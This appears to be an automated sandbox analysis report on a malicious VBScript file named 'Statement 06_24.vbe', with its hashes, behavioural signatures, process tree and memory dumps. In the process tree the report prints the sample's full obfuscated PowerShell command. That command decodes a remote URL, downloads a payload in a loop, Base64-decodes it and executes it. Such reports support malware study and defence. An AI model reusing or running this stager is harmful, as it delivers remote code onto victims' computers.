Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24-06-2024 15:16
Static task
static1
Behavioral task
behavioral1
Sample
Statement 06_24.vbe
Resource
win7-20231129-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Statement 06_24.vbe
Resource
win10v2004-20240611-en
windows10-2004-x64
12 signatures
150 seconds
General
-
Target
Statement 06_24.vbe
-
Size
23KB
-
MD5
207b136f41dce4a20ef01071d8358131
-
SHA1
e5561b3304b7655ff20240631abf1eaa2aff37ef
-
SHA256
63827bccbd36fabd8120635af4e68329bd834dc0e11c75d4bb81797421cb9d35
-
SHA512
76b182aeed7902032265434c78b5757db5e7949e360267fb3a5648586eeb25bf12c22ea4520db4f0b114aeb0f9c5976989c53ec94c5c475a3bc103ccaa5c8eb6
-
SSDEEP
384:nDJcEgWPwf0ulPLLgoylkWz1vAaFYruA/du48nAc55Xid6VKRm3PHAr:nFcEgWIfttLKWs1v9erzdu48Ac55XidH
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
Processes:
powershell.exeflow pid process 5 2204 powershell.exe 6 2204 powershell.exe 7 2204 powershell.exe 8 2204 powershell.exe 9 2204 powershell.exe 10 2204 powershell.exe 11 2204 powershell.exe 12 2204 powershell.exe 13 2204 powershell.exe 14 2204 powershell.exe 15 2204 powershell.exe 16 2204 powershell.exe 17 2204 powershell.exe 18 2204 powershell.exe 19 2204 powershell.exe 20 2204 powershell.exe 21 2204 powershell.exe 22 2204 powershell.exe 23 2204 powershell.exe 24 2204 powershell.exe 25 2204 powershell.exe 26 2204 powershell.exe 27 2204 powershell.exe 28 2204 powershell.exe 29 2204 powershell.exe 30 2204 powershell.exe 31 2204 powershell.exe 32 2204 powershell.exe 33 2204 powershell.exe 34 2204 powershell.exe 35 2204 powershell.exe 36 2204 powershell.exe 37 2204 powershell.exe 38 2204 powershell.exe 39 2204 powershell.exe 40 2204 powershell.exe 41 2204 powershell.exe 42 2204 powershell.exe 43 2204 powershell.exe 44 2204 powershell.exe 45 2204 powershell.exe 46 2204 powershell.exe 47 2204 powershell.exe 48 2204 powershell.exe 49 2204 powershell.exe 50 2204 powershell.exe 51 2204 powershell.exe 52 2204 powershell.exe 53 2204 powershell.exe 54 2204 powershell.exe 55 2204 powershell.exe 56 2204 powershell.exe 57 2204 powershell.exe 58 2204 powershell.exe 59 2204 powershell.exe 60 2204 powershell.exe 61 2204 powershell.exe 62 2204 powershell.exe 63 2204 powershell.exe 64 2204 powershell.exe 65 2204 powershell.exe 66 2204 powershell.exe 67 2204 powershell.exe 68 2204 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2204 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1712 wrote to memory of 2204 1712 WScript.exe powershell.exe PID 1712 wrote to memory of 2204 1712 WScript.exe powershell.exe PID 1712 wrote to memory of 2204 1712 WScript.exe powershell.exe PID 2204 wrote to memory of 3052 2204 powershell.exe cmd.exe PID 2204 wrote to memory of 3052 2204 powershell.exe cmd.exe PID 2204 wrote to memory of 3052 2204 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Statement 06_24.vbe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'civilretsdirektoratet Anatexis Kursustids Delegeringerne Sofisme Lufttrafik flankerede Baedekerian Tolket Boyardom';$Pugh = 1;Function Slbemaalene($Wickedness){$Fristil220=$Wickedness.Length-$Pugh;$Skaaltalernes='SUBSTRIN';$Skaaltalernes+='G';For( $Hovedstadens=5;$Hovedstadens -lt $Fristil220;$Hovedstadens+=6){$civilretsdirektoratet+=$Wickedness.$Skaaltalernes.Invoke( $Hovedstadens, $Pugh);}$civilretsdirektoratet;}function Biller($Interstream){ & ($Jvnlig) ($Interstream);}$Descanting=Slbemaalene ' orsiMWorksoPres zImdegiho.dul AflilRendeaFemi./Artis5Bandb.Aute 0prste ,epol(Req.kWLivsfiIndstn Unind Massononraw.zotisAnnua StopaNUvigtTDrosl Ind.i1spr.g0Paris. ,evi0 Yons; Yell Geig.WE,truiAfsminamalg6Gesan4Trans;merel NasutxBesty6 Back4,orha;skitj TubulrTyktavRoma.:til a1S,egr2Hjuls1Seapo.Pha.y0unge )chres HalakGLythreDeklacblac.k enero Efte/R.vac2gange0 Ca.o1 D.sp0G.yph0Murr 1Opera0Ideal1Bread PolitFTuilliDactyrRebuke Loy.fFejlbo OutsxUnder/ Bred1Bounc2Holom1Resun.Spill0Rene. ';$Demonizing=Slbemaalene 'StammUOutfisDoku,eSinger Over-MulslAEnrapgOffereexonenCiviltInten ';$Sofisme=Slbemaalene ' NowhhEnw.atFavr,t UrnfpBagtjsMu,en:try.s/Be,eg/DemonvGastriSeleklTavlelBruskaRe nt- AngivIndpieTacklnUncont,rassuG,rborearshaJuri.. Storc Nodio Akkvm,agko/ BuscPPolytuLedelmS ienpEquideVentisSamort KaffoSkuesp SatspHippoe abon BulkePeng.sBetr .Bind.t Ove,t ,dviflegem ';$Carpenter=Slbemaalene 'K.uns>Branc ';$Jvnlig=Slbemaalene 'drageiAfgane IntexMinde ';$Transcendency='Baedekerian';$svendenes = Slbemaalene 'Nonfee obracBi tahS illo.kift nta%DunkeaDealkpcultip deald ProcaUd.idtSalataIsaac%Theli\ChapeNPropooscuddn HydrrEkvipeSelekcnotifuImmu rBulrurTegumemailln FrantEmbar.UdskyIGypsycTan.ooPiacu Unpro& Skol&Caric So.dee,unkecLarklhBaromoAdo.i M.rbrtC,kel ';Biller (Slbemaalene ',arst$agentgA.sttl ,nteo Sku bDuplia XantlDefra:Agha,PNoncoi TwineReligp DingoDevieuAldo.dRenitr yante Aima=Embed( KorrcEne.gmgl.trdinapp S.om/Fe tlcBened Bic,$ind,ksSvrnsvUnbure .bonnDolladEnemae undenf.rkle k,nnsprocu)Cruet ');Biller (Slbemaalene 'Neuro$DoggigCri.ol.laeooCytombStripa Om vlIndek: LuftDHaloge DetelSel,te ommagJomfreBidrarNefariUnausnPres.gWhisseFlyv,r BarnnapyraeDyspn=Flume$ CuliSLuftvoAf edfF,eebiatkinsBkformNe,rieCambr. Prd sDyrtipLibidl cordi ealltBr el( Guye$AarvaCHalvfaUnlinrIne tpUndere Bilfn CommtBehage NongrBly o) orf ');Biller (Slbemaalene ' Came[NemerN,olane HuistSjlev.malarSKrympeCupp.rryglnvU.ensi icrcKo.tve tortP ,stroDeadwiSla,tnLysidt.aldsMUncataTortinLoka.aPilo.gVokateSa,elrvindi]Ranam:litte:BlddeS hunneBrekrcCagelu ksterPlan.iingentTomtkyRedruP Alfor UltroMetalt te.poLuksucM.nodo RelilUnli S.or=Sev.n ,rlet[SpiseNDamereUrbantCarls.PesetSTempeePragtcFilmku etalrRoameiPytontk.mulyFlangPKosm r ocaloKlisttJ,nekoUnmiscToponoKisellKam,lTShareyPoddipSkilseBarbs]Af.al: I.me:WaddlTO,erdljoeexs Ox.g1Snerl2b.slu ');$Sofisme=$Delegeringerne[0];$Eurolandenes= (Slbemaalene 'Matte$EndotgStunpl.uperoHu,mebTaagnaP edilKaffe: HaarDForehuBrystaFuld.d Kop sBaksg= TurbNUgev eCourawPneum-SandjO StilbRigsdjBdefoe.nddac Ba.btNonde Os,enSObjecyFolkesTotiptFuglee Hendm wast.StartN utfoe ommetUnder. elioW An.seschwab DiplC MilllZoo oiK.keneUdfo nHomunt');$Eurolandenes+=$Piepoudre[1];Biller ($Eurolandenes);Biller (Slbemaalene 'Hakni$ ontiDIndpauK tjeaRavrrdCu.lesPerit.,intiHOplive.okeraAfregdSucceeS.mkrrMaerksSkygg[Nonc,$fodbaDAftapeA nepmReoxyoSpir,nFenc.iHjulezFloraiS rkenGratug F rs]Whees=Jernb$OpponD Marme ,ntes Blr.cSandwageschnFrivot Di.aiS ovenhavregHewet ');$Fordelens=Slbemaalene 'Ove,l$BeklaDSted.uP.lybaAdvokdA.tensUnchr.NonscDHj rdoConstw,agtanScandl ,reyoBa.tua DragdSladrFKommiiSdeb,lElekteHoved(Ty,ek$ Sub,SD.anto Drikf Lejdi Overs VandmRe,ice Brag,inoxi$glat.CBul.eoJ.stmaTids,uVosbetBekrihKultuo OperrSteri)modta ';$Coauthor=$Piepoudre[0];Biller (Slbemaalene 'Tv,ba$HorsrgE alilTekn oExplabR minaKrokel Norm:NougaOBaktevDesi iAnat sDele.mR.gns=Unawa( igfiTOdysseCorrisDatart Ud,a-UnesoPAktiva ,vultUnenrhImpas Bere$MarkeCSukkeo Boa a SemiuStu.et SkglhSmartoP,ivarPo.te)Presh ');while (!$Ovism) {Biller (Slbemaalene 'Tangs$TarsogA.antlChi.koB gbubLyksaaD anelMolly:podosc taldlN.nagoInstiaOmbygc WelfaPreprlUnchaiPartin De.ee.orba= Spha$Pia,ut Pejlr briduOutsteResti ') ;Biller $Fordelens;Biller (Slbemaalene 'OrdaiSAsymptFremmaLicitrAvailtMilla- EfteS StralReagge AstreSlav,pUrg,n Pio,e4 Re r ');Biller (Slbemaalene 'Justi$SubrogCoranl DansoRekonbEpiloaInstilFores:FiltrO Sparv EngaiMytissKnarrmP,ewi=Aspe (BiosyTBidraeJobbes Ov,rtbache-E.omiPPudreaVse.ttScotchZarri Minim$SkageCKemikoforkraInenuuHashitSmearhNonmao rdirElfla)Pauci ') ;Biller (Slbemaalene ' Ern $RundbgSulculO tego B.libUndigaUd.ytlArami:CommaKBlanduImpetrmy losSgelnuBndersBlyantForesiUnfordTryk s Tje,=Inem $Serisg grunlB,cenoSkyggbLinena Di,ylE tra:AtherAJugemnTuberaUnhayt Ent,eUdenlxUnsa,iChiras kkl+Genne+ Pa.d%Ga,en$ BesyD Undse Herrl EkspeSter.gOuttreKrakkrDollaiGaadenSq isgKimo.eForesrFron nG lpeeMem,h.F zzecTovnioFjte.uCombunKvindtInter ') ;$Sofisme=$Delegeringerne[$Kursustids];}$Mulsler=323529;$Gaminesses=29038;Biller (Slbemaalene 'Musik$ Afreg Balel jendo Balab .orbaTimeflIltfa:AffalT Tetro honilstandkVrtsceEmpart Ledd ,acke= U.de DenveGBrndeeCo,cetEmul,-PonceCLit,ro,steonAntiqtBlokbeTrak,nBgenstSubd. No ps$ PhenCggeunoRkkehaMenneu Violt NondhBrudeoWittir Elas ');Biller (Slbemaalene 'Spe.l$Bihu g varmlRatiooDomabbAccipa T.lpl L dd: FortCIslanaO.erdrHertzrIndhoyRe,rotTyveraGracelPreadeHveps Reeki= Anae Epit[ShawmSKonkuyexp.osOp.ostHolm,eAutopmTerap.VinciC Unv,o PhysnAntipvsp,cte Hyper He,rtClype] Arnt:Ac.im:AfvasFFakikr.ndfro.ompemSc llBNonfeaF rhjs Sphae ,eig6Udret4Eel.rSRetratAlumirGengai IlltnJoggigHe,rd(trffe$ NoniT Tidso Usoll Prevk.ypereSlyngt Coun)Yn,ig ');Biller (Slbemaalene 'Moust$Af.nsg TerrlGillooPhilobRejoiaTabellProcl:ExpedBCineraHellkkSqualkAl,mieIronidTremmr AfspaIonicgClo.kso igo1Chass2innu,8demig Furr=Rygdk Fork [unsenSC.ossyBloatsUnwa.tMelanePter mUntra.H,islTNarcoeSh wlxAutolt E de.Diar,Ekalotn OpdacH tero RumfdO.lbeiCyto nThe.eginter]Dim i: unde:bolsjABughiS LatiCDemifIHu anIsemin. res,G Simpe For.tUoverSCar btFortrrLa.geiTraumnfri igLefti(strkb$Svet Cga umaS.bter virerBisttyTimeftPeaceaInte.lHelleeCount)Un la ');Biller (Slbemaalene ' ,egi$AbubbgUnpenl SubsoDigitbExothaBriskl.elel:AugusO,lectvBoatieEpiter.leshs BundcPr,fouChapot KeracStat hWrothe resedForst= omeo$SkrueBtungma ramakenrobk Sidee Kerad ipstr.antsaKeltsg SvigsSymph1uundv2Praed8Biura. DuresBetinuUn rebUnoffsBlan,t sla rK.ntriRkekonsucklg Aton(Nonco$ThinoMProgruPossilTrapesForsglBea,ee Sr rrOutti,Kre.i$VristG.nsplaStormmTilsaiBlindn DukkeBund sDeponsP,dopeJournsM soc)N,kun ');Biller $Overscutched;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonrecurrent.Ico && echo t"3⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2204-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmpFilesize
4KB
-
memory/2204-5-0x000000001B630000-0x000000001B912000-memory.dmpFilesize
2.9MB
-
memory/2204-6-0x0000000002340000-0x0000000002348000-memory.dmpFilesize
32KB
-
memory/2204-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2204-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2204-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2204-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2204-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2204-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2204-13-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmpFilesize
4KB
-
memory/2204-14-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB